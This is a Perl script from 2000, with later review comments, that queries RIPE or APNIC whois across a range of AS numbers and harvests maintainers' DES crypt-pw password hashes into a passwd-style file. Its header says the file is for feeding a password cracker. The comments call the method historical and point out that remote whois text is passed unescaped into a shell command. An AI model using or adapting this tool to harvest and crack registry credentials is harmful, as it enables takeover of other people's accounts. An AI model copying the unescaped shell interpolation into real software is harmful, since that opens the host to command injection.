#!/usr/bin/perl -w
#
# Brute force create a /etc/passwd-like file with DES-encrypted passwords
# from dumb whois lookups on RIPE and APNIC.  Can be easily modified
# to handle RADB too.  Once the file is created, run Crack (or your favourite
# DES-crack program) on it and create some headache for the ``Internet
# community'' which has decided to reveal DES-encoded passwords as part
# of a whois lookup on a maintainer object.
#
# Copyright 2000, Raju Mathur <raju@linux-delhi.org>, <raju@kandalaya.org>
#
# This program is available under the terms of the GNU General Public License
#
use strict ;
#
# Currently will work on RIPE and APNIC
#
# --- Script state ----------------------------------------------------------
# Historical context (for readers of this corpus): the script depends on
# registries returning the raw crypt-pw hash of a maintainer object in whois
# output.  NOTE(review): RIPE and APNIC have since masked auth: values in
# whois responses ("# Filtered") -- confirm against current registry output.
#
# Number of passwd-style records written to $outfile; reported at the end.
my
  $count = 0 ;
# Positional arguments: output path and registry name, then optional
# start/end AS numbers (see the usage message below).
my
  $outfile = shift ;
my
  $registry = shift ;
# The registry must be given and must mention "apnic" or "ripe" (any case).
# `&&` binds tighter than `||`, so the two pattern tests form one group.
if ( !defined $outfile || !defined $registry
     || $registry !~ /apnic/i && $registry !~ /ripe/i )
{
  print STDERR "usage: $0 output-file APNIC|RIPE [start AS] [end AS]\n" ;
  exit 1 ;
}
# Two-argument open on a bareword handle.  The ">" mode is fixed by the
# literal, but this is still the two-arg form (filename not taken literally,
# e.g. surrounding whitespace is trimmed) that three-arg open replaces.
open OUT , ">$outfile"
  or die "Cannot write to $outfile: $!\n" ;
# AS-number range to walk; defaults are AS1 .. AS12000.
my
  $startas = shift ;
$startas = 1
  if !defined $startas ;
my
  $endas = shift ;
$endas = 12000
  if !defined $endas ;
# The whois server follows the registry argument: APNIC unless it says "ripe".
my
  $server = "whois.apnic.net" ;
$server = "whois.ripe.net"
  if $registry =~ /ripe/i ;
# Per-object fields.  NOTE(review): all five are declared once, outside the
# loop, and only $descr (every iteration, below) and $auth (after a record
# is written) are ever reset.  $maintainer and $notify therefore keep the
# value from an earlier AS whenever the current object has no mnt-by: /
# mnt-nfy: line, so a record can be written with another object's data.
my
  $maintainer ;
my
  $descr ;
my
  $notify ;
my
  $auth ;
my
  $passwd ;
# --- Main loop: two whois lookups per AS number ---------------------------
foreach my $i ( $startas..$endas )
{
  print "*** AS$i\n" ;
  # Lookup 1: the AS object.  Runs the external `whois` command through the
  # shell (two-arg pipe open).  $i is an integer from the range and $server
  # is one of two literals, so nothing remote-controlled is interpolated
  # at this point.
  open WHOIS , "whois AS$i\@$server|"
    or die "Cannot whois AS$i: $!\n" ;
  # The first "mnt-by:" line wins.  Lines are not chomped, but `.` does not
  # match "\n", so the capture excludes the trailing newline.
  while ( <WHOIS> )
  {
    if ( /^mnt-by:\s*(.*)/ )
    {
      $maintainer = $1 ;
      last ;
    }
  }
  close WHOIS ;
  # Stale-state caveat: this only skips while no mnt-by: line has been seen
  # in *any* iteration so far (see the declarations above).
  next
    if !$maintainer ;
  print "*** $maintainer\n" ;
  # Lookup 2: the maintainer object.  SECURITY (for the host running this):
  # $maintainer is text copied verbatim from the remote whois response and
  # is interpolated into a shell command line without any escaping, so a
  # hostile or compromised whois server can run arbitrary commands on the
  # machine executing this script.
  open WHOIS , "whois $maintainer\@$server|"
    or die "Cannot whois $maintainer: $!\n" ;
  $descr = "" ;
  # Collect every descr: line (comma-joined), the last mnt-nfy: and the last
  # auth: line seen, stopping at the first auth: that mentions crypt-pw.
  while ( <WHOIS> )
  {
    if ( $_ =~ /^descr:\s*(.*)/ )
    {
      $descr .= "$1, " ;
    }
    if ( $_ =~ /^mnt-nfy:\s*(.*)/ )
    {
      $notify = $1 ;
    }
    if ( $_ =~ /^auth:\s*(.*)/ )
    {
      $auth = $1 ;
    }
    last if $auth && $auth =~ /crypt-pw/i ;
  }
  # Objects without a crypt-pw auth: line are skipped.  This `next` runs
  # before the close below, so the pipe to `whois` stays open until the
  # next open on the same bareword handle replaces it.
  next
    if !$auth || $auth !~ /crypt-pw/i ;
# Debug trace (left at column 0 in the original).  Under -w (shebang line)
# this warns about an uninitialized value until a mnt-nfy: line is seen.
print "*** <$descr> <$notify> <$auth>\n" ;
  close WHOIS ;
  # The match is guaranteed by the crypt-pw test above, so $1 is the text
  # following "crypt-pw" (the hash as printed by the registry).
  $auth =~ /.*crypt-pw\s*(.*)/i ;
  $passwd = $1 ;
  # Strip characters that would break the colon-separated passwd layout.
  # The substitution on $notify also warns under -w if it is still undef.
  $descr =~ s/[\n:]//g ;
  $notify =~ s/://g ;
  # One /etc/passwd-style line: maintainer name as the user, the crypt-pw
  # hash as the password field, fixed uid/gid 42, descr as GECOS, no home
  # directory, /bin/sh as the shell.
  print OUT "$maintainer:$passwd:42:42:$descr:/dev/null:/bin/sh\n" ;
  # Only $auth is reset after a successful record; $maintainer and $notify
  # carry over (see the caveat on the declarations above).
  $auth = "" ;
  $count++ ;
}
# NOTE(review): close on the write handle is unchecked, so a buffered write
# error to $outfile would go unreported.
close OUT ;
print "$count records\n" ;
